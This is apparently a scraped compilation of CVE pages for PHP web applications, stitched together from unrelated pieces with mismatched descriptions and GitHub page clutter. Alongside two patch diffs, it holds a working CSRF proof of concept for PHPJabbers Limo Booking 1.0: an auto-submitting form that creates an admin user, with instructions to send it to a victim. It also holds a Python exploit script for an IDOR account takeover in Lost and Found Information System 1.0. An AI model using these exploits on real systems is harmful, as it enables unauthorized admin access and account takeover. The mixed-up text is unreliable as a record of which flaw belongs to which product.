trim($v\_rclone\_path, "'") ?>" value\="<?= htmlentities(trim($v\_rclone\_path, "'")) ?>" \> </div\> </div\> Expand Down Expand Up @@ -946,33 +946,33 @@ class="form-control u-min-height100 u-console" <ul class\="values-list"\> <li class\="values-list-item"\> <span class\="values-list-label"\><?= \_("Issued To") ?></span\> <span class\="values-list-value"\><?= $v\_ssl\_subject ?></span\> <span class\="values-list-value"\><?= htmlentities($v\_ssl\_subject) ?></span\> </li\> <?php if ($v\_ssl\_aliases) { ?> <li class\="values-list-item"\> <span class\="values-list-label"\><?= \_("Alternate") ?></span\> <span class\="values-list-value"\><?= $v\_ssl\_aliases ?></span\> <span class\="values-list-value"\><?= htmlentities($v\_ssl\_aliases) ?></span\> </li\> <?php } ?> <li class\="values-list-item"\> <span class\="values-list-label"\><?= \_("Not Before") ?></span\> <span class\="values-list-value"\><?= $v\_ssl\_not\_before ?></span\> <span class\="values-list-value"\><?= htmlentities($v\_ssl\_not\_before) ?></span\> </li\> <li class\="values-list-item"\> <span class\="values-list-label"\><?= \_("Not After") ?></span\> <span class\="values-list-value"\><?= $v\_ssl\_not\_after ?></span\> <span class\="values-list-value"\><?= htmlentities($v\_ssl\_not\_after) ?></span\> </li\> <li class\="values-list-item"\> <span class\="values-list-label"\><?= \_("Signature") ?></span\> <span class\="values-list-value"\><?= $v\_ssl\_signature ?></span\> <span class\="values-list-value"\><?= htmlentities($v\_ssl\_signature) ?></span\> </li\> <li class\="values-list-item"\> <span class\="values-list-label"\><?= \_("Key Size") ?></span\> <span class\="values-list-value"\><?= $v\_ssl\_pub\_key ?></span\> <span class\="values-list-value"\><?= htmlentities($v\_ssl\_pub\_key) ?></span\> </li\> <li class\="values-list-item"\> <span class\="values-list-label"\><?= \_("Issued By") ?></span\> <span class\="values-list-value"\><?= $v\_ssl\_issuer ?></span\> <span class\="values-list-value"\><?= htmlentities($v\_ssl\_issuer) ?></span\> </li\> </ul\> </div\> Expand Down

CVE-2023-4517: Security patch for XSS in Edit server (#3946) · hestiacp/hestiacp@d30e3ed

Cross-site Scripting (XSS) - Stored in GitHub repository froxlor/froxlor prior to 2.1.0-dev1.

Skip to content

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    

*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
*   Pricing

**Search code, repositories, users, issues, pull requests...**

**Provide feedback**

**Saved searches****Use saved searches to filter your results more quickly**

Sign up

*   Notifications
*   Fork 448

*   Code
*   Issues 42
*   Pull requests 5
*   Actions
*   Projects 3
*   Wiki
*   Security
*   Insights

**Commit**

Permalink

Browse files

Browse the repository at this point in the history

enable markdown syntax in custom\_notes field

Signed-off-by: Michael Kaufmann <d00p@froxlor.org>

*   Loading branch information

d00p committed

Oct 2, 2023

1 parent a808a3f commit e8ed430

Showing **9 changed files** with **511 additions** and **39 deletions**.

*   composer.json
*   composer.lock
*   *   *   Markdown.php
    *   *   *   Customer.php
            *   Text.php
        *   *   FroxlorTwig.php
*   *   de.lng.php
    *   en.lng.php
*   *   index.html.twig

4 changes: 2 additions & 2 deletions composer.json

Expand Up

@@ -53,10 +53,10 @@

"froxlor/idna-convert-legacy": "^2.1",

"voku/anti-xss": "^4.1",

"twig/twig": "^3.3",

"erusev/parsedown": "^1.7",

"symfony/console": "^5.4",

"pear/net\_dns2": "^1.5",

"amnuts/opcache-gui": "^3.4"

"amnuts/opcache-gui": "^3.4",

"league/commonmark": "^2.4"

},

"require-dev": {

"phpunit/phpunit": "^9",

Expand Down

**0 comments on commit e8ed430**

Please sign in to comment.

CVE-2023-5564: enable markdown syntax in custom_notes field · Froxlor/Froxlor@e8ed430

PHPJabbers Limo Booking Software 1.0 is vulnerable to Cross Site Request Forgery (CSRF) to add an admin user via the Add Users Function, aka an index.php?controller=pjAdminUsers&action=pjActionCreate URI.

**Name already in use**

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?

**1** branch **0** tags

Code

*   Use Git or checkout with SVN using the web URL.
    
*   Open with GitHub Desktop
*   Download ZIP

**Latest commit**

**Files**

Permalink

Failed to load latest commit information.

Type

Name

Latest commit message

Commit time

\# CVE-2023-43147

 Vendor: PHPJabbers
 Vendor Homepage: https://www.phpjabbers.com/
 Software Link: https://www.phpjabbers.com/limo-booking-software
 Version: 1.0
 Tested on: Windows 10 Pro
 Impact: Add an attacker user with admin privileges
 CVE:

 Cross Site Request Forgery vulnerability in limo-booking-software allows a remote attacker to execute add and user with admin privileges
 

POC
 1 - Make an file with with this CODE and SAVE in HTML . If you save a new request to make a CSRF be sure that you change role\_id=0 to 1 (role\_id=1)

 <html>
    <body>
    <form action="https://demo.phpjabbers.com/1694190842\_980/index.php?controller=pjAdminUsers&action=pjActionCreate" method="POST">
      <input type="hidden" name="user&#95;create" value="1" />
      <input type="hidden" name="role&#95;id" value="1" />
      <input type="hidden" name="email" value="hacker&#64;admin&#46;tor" />
      <input type="hidden" name="password" value="admin1234" />
      <input type="hidden" name="name" value="admintor" />
      <input type="hidden" name="phone" value="" />
      <input type="hidden" name="status" value="T" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms\[0\].submit();
    </script>
  </body>
</html>

2 - Example test.html

3 - Send to the victim

4 - When the victim open the html the file test.html will open in his navigator and when he will open and press click at the button the code will changes in his actually session and one user will add in the panel admin
with admin privileges.

CVE-2023-43147: GitHub - MinoTauro2020/CVE-2023-43147: CVE-2023-43148

PHPJabbers Limo Booking Software 1.0 is vulnerable to Cross Site Request Forgery (CSRF) via the Add Users Function, aka an index.php?controller=pjAdminUsers&action=pjActionCreate URI.

CVE-2023-43147

Lost and Found Information System version 1.0 suffers from an insecure direct object reference vulnerability that allows for account takeover.

    # Exploit Title: Lost and Found Information System v1.0 - idor leads to Account Take over # Date: 2023-12-03# Exploit Author: OR4NG.M4N# Category : webapps# CVE : CVE-2023-38965Python p0c :import argparseimport requestsimport timeparser = argparse.ArgumentParser(description='Send a POST request to the target server')parser.add_argument('-url', help='URL of the target', required=True)parser.add_argument('-user', help='Username', required=True)parser.add_argument('-password', help='Password', required=True)args = parser.parse_args()url = args.url + '/classes/Users.php?f=save'data = {    'id': '1',    'firstname': 'or4ng',    'middlename': '',    'lastname': 'Admin',    'username': args.user,    'password': args.password}response = requests.post(url, data)if b"1" in response.content:    print("Exploit ..")    time.sleep(1)    print("User :" + args.user + "\nPassword :" + args.password)else:    print("Exploit Failed..")

Tag

#php